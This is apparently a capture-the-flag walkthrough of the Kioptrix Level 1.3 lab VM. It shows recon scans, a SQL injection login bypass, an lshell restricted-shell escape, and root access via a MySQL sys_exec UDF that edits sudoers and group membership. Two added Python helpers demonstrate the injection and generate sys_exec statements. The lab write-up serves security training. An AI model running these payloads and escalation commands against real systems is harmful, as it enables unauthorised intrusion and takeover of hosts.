KIOPTRIX: LEVEL 1.3 (#4) Walkthrough


Posted by nathan2009729 on 2022-10-30

Preparation

The downloaded VM image comes without a .vmx file, so VMware cannot open it. Rather than write one from scratch, I took the .vmx from KIOPTRIX: LEVEL 1.2 (#3) and adapted it (which is why displayName still reads KioptrixVM3). Create Kioptrix4_vmware.vmx in the extracted directory with the following contents:


.encoding = "windows-1252"
config.version = "8"
virtualHW.version = "4"
memsize = "512"
MemAllowAutoScaleDown = "FALSE"
displayName = "KioptrixVM3"
guestOS = "other"
ethernet0.addressType = "generated"
ethernet0.connectionType = "nat"
ide0:0.present = "TRUE"
ide0:0.fileName = "Kioptrix4_vmware.vmdk"
ide1:0.present = "TRUE"
ide1:0.autodetect = "TRUE"
ide1:0.filename = "auto detect"
ide1:0.deviceType = "cdrom-raw"
virtualHW.productCompatibility = "hosted"
numa.autosize.cookie = "10001"
numa.autosize.vcpu.maxPerVirtualNode = "1"
uuid.bios = "56 4d ae 69 93 19 55 ff-ec f1 b6 26 b7 b4 17 66"
uuid.location = "56 4d ae 69 93 19 55 ff-ec f1 b6 26 b7 b4 17 66"
ide0:0.redo = ""
svga.vramSize = "134217728"
vmotion.checkpointFBSize = "134217728"
ethernet0.generatedAddressOffset = "0"
monitor.phys_bits_used = "36"
cleanShutdown = "TRUE"
softPowerOff = "FALSE"
tools.syncTime = "FALSE"
ethernet0.present = "TRUE"
ethernet0.generatedAddress = "00:0c:29:b4:17:66"
toolsInstallManager.updateCounter = "1"
checkpoint.vmState = ""
extendedConfigFile = "Kioptrix4_vmware.vmxf"

0x01 Information Gathering

1.1 nmap scan

Scan for open ports:

$ nmap -A -T4 192.168.44.132
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 21:03 CST
Nmap scan report for 192.168.44.132
Host is up (0.00058s latency).
Not shown: 566 closed tcp ports (conn-refused), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2022-10-24T17:03:39-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.87 seconds
Segmentation fault

Then nikto against the web server:

$ nikto -host 192.168.44.132
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.44.132
+ Target Hostname:    192.168.44.132
+ Target Port:        80
+ Start Time:         2022-10-24 21:09:33 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2022-10-24 21:09:45 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Since port 80 is open, first open the site in a browser.

1.2 Directory brute-forcing

Next, brute-force directories with dirb:

$ dirb http://192.168.44.132

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 24 21:46:15 2022
URL_BASE: http://192.168.44.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.44.132/ ----
+ http://192.168.44.132/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.44.132/images/
+ http://192.168.44.132/index (CODE:200|SIZE:1255)
+ http://192.168.44.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.44.132/john/
+ http://192.168.44.132/logout (CODE:302|SIZE:0)
+ http://192.168.44.132/member (CODE:302|SIZE:220)
+ http://192.168.44.132/server-status (CODE:403|SIZE:334)

---- Entering directory: http://192.168.44.132/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.44.132/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

There is a john directory. Browsing to it shows a directory listing with john.php in it, but clicking john.php just redirects back to the login page, so the next step is to try SQL injection against the login form's username and password fields.

0x02 Vulnerability Probing

After some probing: a single quote in the password field produces the following SQL error:

**Warning**: mysql_num_rows(): supplied argument is not a valid MySQL result resource in **/var/www/checklogin.php** on line **28**

instead of just "Wrong Username or Password", so the password field is injectable. The warning also leaks the backend (mysql_num_rows, so MySQL) and the script path /var/www/checklogin.php, both of which come in handy later. A single quote in the username field only gives "Wrong Username or Password".

Using john as the username and ' or 1=1 # as the password, the login succeeds and the member page appears:
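The injection above, reproduced as an added Python example (this is not code from the post or from the Kioptrix box; it uses SQLite in memory so it runs offline). It assumes checklogin.php builds its query by string concatenation the way john.php, shown further down, concatenates the session username; the members table and its placeholder passwords are constructed here. It shows why a lone quote produces a database error while a tautology logs you in, why the same input against a parameterised query is harmless, and why the member panel then prints the stored password for whichever username you typed:

```python
import sqlite3

# Constructed sample table standing in for `members`. The placeholder
# passwords are NOT the ones on the box; only the column layout
# (id, username, password) follows what john.php prints (row[1], row[2]).
MEMBERS = [
    (1, "john", "john-password-placeholder"),
    (2, "robert", "robert-password-placeholder"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def build_login_query(username, password):
    """The query string as the server would see it. Assumption: checklogin.php
    concatenates both POST fields into the SQL the same way john.php
    concatenates $_SESSION['myusername']; the post does not show checklogin.php."""
    return ("SELECT * FROM members WHERE username='%s' and password='%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Mirror of the PHP flow: run the concatenated query, then treat a
    non-zero row count as a successful login (mysql_num_rows($result) != 0).
    A query that fails to parse is the analogue of the mysql_num_rows()
    warning the post saw when a lone single quote was submitted."""
    try:
        rows = conn.execute(build_login_query(username, password)).fetchall()
    except sqlite3.OperationalError:
        return "sql-error"
    return "ok" if len(rows) != 0 else "denied"


def safe_login(conn, username, password):
    """Parameterised version: the payload is compared as data, never parsed."""
    rows = conn.execute(
        "SELECT * FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return "ok" if len(rows) != 0 else "denied"


def member_panel(conn, session_username):
    """What john.php does once $_SESSION['myusername'] is set: select the row
    for that username and print row[1] and row[2], i.e. the username and the
    stored (plaintext) password."""
    row = conn.execute(
        "SELECT * FROM members WHERE username=?", (session_username,)
    ).fetchone()
    return None if row is None else (row[1], row[2])


# Payloads. The post used `' or 1=1 #` against MySQL, where `#` starts a
# comment that swallows the trailing quote appended by the PHP code. SQLite
# has no `#` comment, so the executable demo uses the `-- ` form, which has
# the same effect in both engines.
MYSQL_PAYLOAD = "' or 1=1 #"
SQLITE_PAYLOAD = "' or 1=1 -- "


def demo():
    conn = make_db()
    return {
        "query_as_mysql_sees_it": build_login_query("john", MYSQL_PAYLOAD),
        "wrong_password": vulnerable_login(conn, "john", "wrong"),
        "lone_quote": vulnerable_login(conn, "john", "'"),
        "tautology": vulnerable_login(conn, "john", SQLITE_PAYLOAD),
        "tautology_parameterised": safe_login(conn, "john", SQLITE_PAYLOAD),
        "panel_after_bypass": member_panel(conn, "john"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see each result. The tautology works because AND binds tighter than OR, so `username='john' and password='' or 1=1` matches every row and the row count is never zero; the session then records the username you typed, and the member panel looks that user up and prints the password column.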

0x03 Get Shell

Since the page hands us an account name and what is obviously a plaintext password, try SSH with them directly.

$ ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.44.132
The authenticity of host '192.168.44.132 (192.168.44.132)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.132' (DSA) to the list of known hosts.
john@192.168.44.132's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands

Typing help shows that only a handful of commands are allowed:

john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

So this account needs more than these commands. The following article covers restricted shell escapes:

How to Escape Restricted Shell Environments on Linux « Null Byte :: WonderHowTo

In short, because echo is allowed, the following line gets us an unrestricted shell. "LigGoat Shell" is lshell (its 0.9.12 source tree turns up under /root later); the argument is Python source, and this lshell version ends up executing it, so os.system() spawns a normal bash:

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$

0x04 Privilege Escalation

Privilege escalation options: 1. modify relevant files (/etc/passwd, /etc/sudoers); 2. use an existing exploit script; 3. escalate through MySQL.

How do we know the database is MySQL? The error message from the SQL injection test already said so.

To escalate through MySQL we first need database credentials. Apache's DocumentRoot is served directly over HTTP (on this Ubuntu release it is /var/www; newer releases use /var/www/html), so the john.php we saw in the listing should be in there along with the login code. Change into it:

john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ cd ..
john@Kioptrix4:/$ pwd
/
john@Kioptrix4:/$ cd /var/www
john@Kioptrix4:/var/www$ ls
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:/var/www$ cd john/
john@Kioptrix4:/var/www/john$ ls
john.php
john@Kioptrix4:/var/www/john$ cat john.php
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:../index.php");
}else{
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

$result=mysql_query("SELECT * FROM $tbl_name WHERE username='".$_SESSION['myusername']."'");

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
        $row = mysql_fetch_array($result);
}
else {
echo "Something went wrong";
}

ob_end_flush();

?>

<html><body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
        <tr>
                <td>
                        <table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
                                <tr>
                                        <td align="center"  colspan="3"><strong>Member's Control Panel </strong></td>
                                </tr>
                                <tr>
                                        <td width="30">Username</td>
                                        <td width="6">:</td>
                                        <td width="464"><?php print ($row[1]);?></td>
                                </tr>
                                <tr>
                                        <td width="30">Password</td>
                                        <td width="6">:</td>
                                        <td width="464"><?php print($row[2]);?></td>
                                </tr>
                                <tr>
                                        <td>&nbsp;
                                        <form method="link" action="logout.php">
                                        <input type=submit value="Logout">
                                        </form>
                                        </td>
                                        <td>&nbsp;</td>
                                </tr>
                        </table>
                </td>
        </tr>
</table>
</body></html>

<?php
}
?>

Two lines in john.php stand out:

$username="root"; // Mysql username
$password=""; // Mysql password

The MySQL root account has an empty password. So log in to MySQL as root and just press Enter at the password prompt:

john@Kioptrix4:/var/www/john$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

First check the MySQL version:

mysql> \s
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

Connection id:          8
Current database:
Current user:           root@localhost
SSL:                    Not in use
Current pager:          stdout
Using outfile:          ''
Using delimiter:        ;
Server version:         5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:       10
Connection:             Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:            /var/run/mysqld/mysqld.sock
Uptime:                 1 hour 22 min 27 sec

Threads: 1  Questions: 38  Slow queries: 0  Opens: 24  Flush tables: 1  Open tables: 18  Queries per second avg: 0.008
--------------

So it is 5.0.51a-3ubuntu5.4.

For database privilege escalation, see these two articles:

MySQL提权的三种方法 - FreeBuf网络安全行业门户
【数据库提权系列】---【Mysql-UDF提权篇】 - FreeBuf网络安全行业门户

In short, a MySQL server on Linux can run operating-system commands through the sys_eval / sys_exec user-defined functions, but the UDF shared library has to be loaded and registered first (sqlmap ships it as lib_mysqludf_sys.so_ under sqlmap-master/data/udf/mysql/linux/64, with a linux/32 build alongside it; this box is 32-bit, per the i486 in the client banner above, so the 32 variant would be the right one).

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| members            |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
| sys_exec              |   0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

mysql> select sys_eval("whoami");
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist
mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
| NULL                              |
+-----------------------------------+

But the output of select * from func; shows that lib_mysqludf_sys.so is already registered, so there is no .so to upload: sys_exec can be called directly. sys_eval was never registered, hence the ERROR 1305. sys_exec returns nothing useful (NULL here) rather than the command's output, so the only way to know it ran is a side effect:

To confirm that sys_exec actually executed, check whether the file really appeared in /tmp:

mysql> quit
Bye
john@Kioptrix4:~$ cd /tmp
john@Kioptrix4:/tmp$ ls -l
total 0
-rw-rw---- 1 root root 0 2022-10-29 04:53 test_mysql

The file is owned by root, so mysqld itself is running as root (a default install runs it as the unprivileged mysql user, and sys_exec would then only give us that account). Everything passed to sys_exec therefore runs as root, and we can use it to edit /etc/sudoers, give the user robert full sudo, or add john to a privileged group.

Give robert passwordless sudo (a sudoers line does not create an account, it only grants rights to an existing one; and appending straight to /etc/sudoers bypasses visudo's syntax check, so a malformed line would break sudo for every user):

select sys_exec('echo "robert ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');

Add john to the admin group, which the default Ubuntu sudoers grants full sudo via %admin ALL=(ALL) ALL:

select sys_exec('usermod -a -G admin john');
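The two facts this escalation rests on, that sys_exec is already registered in mysql.func and that the probe file in /tmp came out owned by root, together with the sys_exec statements above, in one added Python helper. This is not code from the post: it parses copies of the func table and the ls -l line from the session above (embedded here as constructed samples), quotes an arbitrary command as a MySQL string literal, and emits the CREATE FUNCTION statement that would still be needed if the UDF were not registered. The return types are those lib_mysqludf_sys declares for its own functions; the function and variable names are this example's own:

```python
# Constructed copies of the two pieces of evidence from the session above.
FUNC_TABLE = """\
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
| sys_exec              |   0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
"""
LS_LINE = "-rw-rw---- 1 root root 0 2022-10-29 04:53 test_mysql"

# Return types lib_mysqludf_sys declares for its functions; only needed when a
# function still has to be registered with CREATE FUNCTION.
UDF_RETURN_TYPES = {
    "sys_exec": "INTEGER",
    "sys_eval": "STRING",
    "sys_get": "STRING",
    "sys_set": "INTEGER",
    "lib_mysqludf_sys_info": "STRING",
}


def parse_mysql_table(text):
    """Turn the ASCII table printed by the mysql client into a list of dicts."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # +----+ border lines and anything else
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def registered_udfs(func_table_text, soname="lib_mysqludf_sys.so"):
    """Function names in mysql.func that are backed by the given shared object."""
    return {r["name"] for r in parse_mysql_table(func_table_text) if r["dl"] == soname}


def file_owner(ls_l_line):
    """Owner column of one `ls -l` line: the user the creating process ran as."""
    return ls_l_line.split()[2]


def mysql_string_literal(text):
    """Quote text as a MySQL single-quoted literal (backslash and quote escaped),
    so commands containing single quotes survive the trip through SQL."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def sys_exec_statement(command):
    return "SELECT sys_exec(%s);" % mysql_string_literal(command)


def create_function_statement(name, soname="lib_mysqludf_sys.so"):
    return "CREATE FUNCTION %s RETURNS %s SONAME '%s';" % (
        name, UDF_RETURN_TYPES[name], soname)


def plan_after_probe(func_table_text, probe_ls_line, command):
    """Given the func table and the `ls -l` line of a file created through a
    first sys_exec probe, return (go, statements, notes)."""
    udfs = registered_udfs(func_table_text)
    statements, notes = [], []
    if "sys_exec" not in udfs:
        notes.append("sys_exec not in mysql.func: copy the .so into the plugin "
                     "directory, then register it")
        statements.append(create_function_statement("sys_exec"))
    if "sys_eval" not in udfs:
        notes.append("sys_eval not registered (ERROR 1305 expected); sys_exec "
                     "returns no output, so verify through a side effect")
    owner = file_owner(probe_ls_line)
    if owner != "root":
        notes.append("probe file owned by %s: mysqld is not root, sys_exec "
                     "only yields that account" % owner)
        return False, statements, notes
    statements.append(sys_exec_statement(command))
    return True, statements, notes


if __name__ == "__main__":
    go, stmts, why = plan_after_probe(FUNC_TABLE, LS_LINE, "usermod -a -G admin john")
    print("proceed:", go)
    for note in why:
        print("note:", note)
    for stmt in stmts:
        print(stmt)
```

plan_after_probe() refuses to emit the escalation statement when the probe file is not root-owned, because then mysqld is running as a less privileged user and sys_exec would only give you that account; on this box the owner is root, so the usermod statement is emitted as-is.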

Here we go with the second approach:

john@Kioptrix4:/tmp$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 12
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql;
No connection. Trying to reconnect...
Connection id:    1
Current database: *** NONE ***

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.05 sec)

Open a new terminal and test. Supplementary group membership only takes effect at the next login, so the existing session is no use here; log in again over SSH:

$  ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.44.132
john@192.168.44.132's password:
Permission denied, please try again.
john@192.168.44.132's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john#

Find the flag:

root@Kioptrix4:~# locate root
/root
/etc/init.d/checkroot.sh
/etc/init.d/umountroot
/etc/rc0.d/S60umountroot
/etc/rc6.d/S60umountroot
/etc/rcS.d/S20checkroot.sh
/lib/security/pam_rootok.so
/root/.bash_history
/root/.bashrc
/root/.lhistory
/root/.mysql_history
/root/.nano_history
/root/.profile
/root/.ssh
/root/congrats.txt
/root/lshell-0.9.12
/root/.ssh/known_hosts
/root/lshell-0.9.12/CHANGES
/root/lshell-0.9.12/COPYING
/root/lshell-0.9.12/MANIFEST.in
/root/lshell-0.9.12/PKG-INFO
/root/lshell-0.9.12/README
/root/lshell-0.9.12/bin
/root/lshell-0.9.12/build
/root/lshell-0.9.12/etc
/root/lshell-0.9.12/lshell.spec
/root/lshell-0.9.12/lshellmodule
/root/lshell-0.9.12/man
/root/lshell-0.9.12/setup.py
/root/lshell-0.9.12/test
/root/lshell-0.9.12/bin/lshell
/root/lshell-0.9.12/build/lib
/root/lshell-0.9.12/build/scripts-2.5
/root/lshell-0.9.12/build/lib/lshell.py
/root/lshell-0.9.12/build/scripts-2.5/lshell
/root/lshell-0.9.12/etc/logrotate.d
/root/lshell-0.9.12/etc/lshell.conf
/root/lshell-0.9.12/etc/logrotate.d/lshell
/root/lshell-0.9.12/lshellmodule/lshell.py
/root/lshell-0.9.12/man/lshell.1
/root/lshell-0.9.12/test/test_lshell.py
/sbin/pivot_root
/usr/lib/klibc/bin/chroot
/usr/lib/klibc/bin/pivot_root
/usr/sbin/chroot
/usr/sbin/rootflags
/usr/share/man/man8/chroot.8.gz
/usr/share/man/man8/pam_rootok.8.gz
/usr/share/man/man8/pivot_root.8.gz
/usr/share/man/man8/rootflags.8.gz
/usr/share/man/man8/sudo_root.8.gz
/usr/share/mysql/mysql-test/include/not_as_root.inc
/usr/share/mysql/mysql-test/r/not_as_root.require
/usr/share/recovery-mode/options/root
/var/log/fsck/checkroot

The flag is at /root/congrats.txt.

References

MySQL提权的三种方法 - FreeBuf网络安全行业门户
【数据库提权系列】---【Mysql-UDF提权篇】 - FreeBuf网络安全行业门户
https://lonelysec.com/vulnhub-x-kioptrix-level-1-3-4/
[資訊安全] VulnHub – Kioptrix Level 1.3 (#4) Write-up - MkS
Bernardo Dag: Command execution with a MySQL UDF
vulnhub-serial靶机缺.vmx文件解决方法_zonei123的博客-CSDN博客
How to Escape Restricted Shell Environments on Linux « Null Byte :: WonderHowTo


#attack #Vulnhub #SQL Injection #Database Privilege Escalation






